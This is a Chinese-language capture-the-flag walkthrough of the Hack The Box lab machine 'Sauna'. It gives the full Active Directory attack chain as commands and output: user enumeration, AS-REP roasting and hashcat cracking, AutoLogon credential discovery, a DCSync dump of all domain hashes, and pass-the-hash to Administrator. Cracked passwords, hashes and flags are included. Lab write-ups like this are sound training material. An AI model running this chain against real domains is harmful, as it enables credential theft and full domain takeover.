HTB Sauna
Sauna
拿shell
扫端口
$ nmap -p- -sV 10.129.95.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-03-04 02:54 CST
Nmap scan report for 10.129.95.180
Host is up (0.013s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-04 15:56:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC80有ISS/10.0服务,但是洞都修了,没看到能打的
smb能匿名登录但是无法枚举共享列表
$ smbclient -L 10.129.95.180
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available通过nxc拿到域名,添加host
$ nxc smb 10.129.95.180
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)ldap查一下
$ ldapsearch -x -H ldap://10.129.95.180 -b "dc=egotistical-bank,dc=local"
# ...
# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
# ...注意到一个用户Hugo Smith,回去80端口看看web服务,发现有about页面可以看到人名
Hugo Smith
Fergus Smith
Shaun Coins
Sophie Driver
Bowie Taylor
Hugo Bear
Steven Kerb可以枚举下用户名
$ ./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.95.180
2026/03/04 04:38:56 > Using KDC(s):
2026/03/04 04:38:56 > 10.129.95.180:88
2026/03/04 04:38:57 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:00 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:00 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:04 > [+] VALID USERNAME: [email protected]
2026/03/04 04:39:23 > [+] VALID USERNAME: [email protected]根据规律,可以构造出如下用户列表,并保存为users.txt
administratohsmithr
hsmith
fsmith
scoins
sdriver
btaylor
hbear
skerb一般来说,Kerberos 身份验证时,请求方必须先向 DC 进行身份验证。但如果用户开启了 UF_DONT_REQUIRE_PREAUTH ,会直接将hash发送给用户
可以使用GetNPUsers.py来探测
$ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -dc-ip 10.129.95.180
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:affe1a644beb15b8651f129ff7bb681f$afa4ebe9839874cb3211e976bbb51b4db5462f1a54e7407a1150a25049fadb302d428739359999c5efeb277aefcb080f5a9daa6577916f768d7b07f6f64c16630abcb01a25b6f3a1961872884d9bafda89285fad8ccf7e4a8b5a5f111ac6b1e4c5895b4fd3dae89bbb2e4c80501ccfbd5bae1da229ee6652708741f175144bafe8cc7ef2af2252003735f5cdea5e4ff97855439229ea642574c5c35296a66b6541cdc24ec40a9b9dd492be6efb2e293d054f4ae6ba5b77990d19cefa2d507e6064ab5943d2b9d3a87ce8918bb28f8de78f881330b3cbb8d511a851a3732331af10233f5d2a022233c051e3c1c15eaa7bf315512ce2e3a8ea7ee031c43f646973发现用户fsmith存在该漏洞。将hash存为文件,然后hashcat爆破
$ hashcat hash /usr/share/wordlists/rockyou.txt
# ...
[email protected]:affe1a644beb15b8651f129ff7bb681f$afa4ebe9839874cb3211e976bbb51b4db5462f1a54e7407a1150a25049fadb302d428739359999c5efeb277aefcb080f5a9daa6577916f768d7b07f6f64c16630abcb01a25b6f3a1961872884d9bafda89285fad8ccf7e4a8b5a5f111ac6b1e4c5895b4fd3dae89bbb2e4c80501ccfbd5bae1da229ee6652708741f175144bafe8cc7ef2af2252003735f5cdea5e4ff97855439229ea642574c5c35296a66b6541cdc24ec40a9b9dd492be6efb2e293d054f4ae6ba5b77990d19cefa2d507e6064ab5943d2b9d3a87ce8918bb28f8de78f881330b3cbb8d511a851a3732331af10233f5d2a022233c051e3c1c15eaa7bf315512ce2e3a8ea7ee031c43f646973:Thestrokes23
# ...拿到密码Thestrokes23,登录
$ evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\FSmith\desktop> type user.txt
812a833eee294fe0cd35caa004723d4e提权
bloodhound分析一下
bloodhound-python -u fsmith -p Thestrokes23 -ns 10.129.95.180 -d EGOTISTICAL-BANK.LOCAL -c All --zip由于目前只控制了用户fsmith,没看到有用的信息
继续使用winPEAS
# ...
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
# ...找到一个自动登录凭证,尝试登录,但是失败了
检查下用户有哪些
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr发现是原来是名字不一样,换成svc_loanmgr即可
$ evil-winrm -i 10.129.95.180 -u svc_loanmgr -p Moneymakestheworldgoround!
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr成功登录,然后bloodhound分析一下这个
可以打DCSyn
$ secretsdump.py 'svc_loanmgr:[email protected]'$ secretsdump.py 'svc_loanmgr:[email protected]'
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:c64aecb288883c2668ecc6d332a820a0:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:ff4a2dcede473f2bb313a3beee8484644123f7340ea2f45cc179774aaecf23fb
SAUNA$:aes128-cts-hmac-sha1-96:35fecbe71951682492e232db60abe044
SAUNA$:des-cbc-md5:911a8fc7ad3167d9
[*] Cleaning up... 哈希传递,登录
$ evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
a56ed3980e14c834b97cf7982e2ad0ac总结
学到了UF_DONT_REQUIRE_PREAUTH配置错误->导出hash->离线破解,DCSync攻击,信息搜集方式等
许可协议:
CC BY 4.0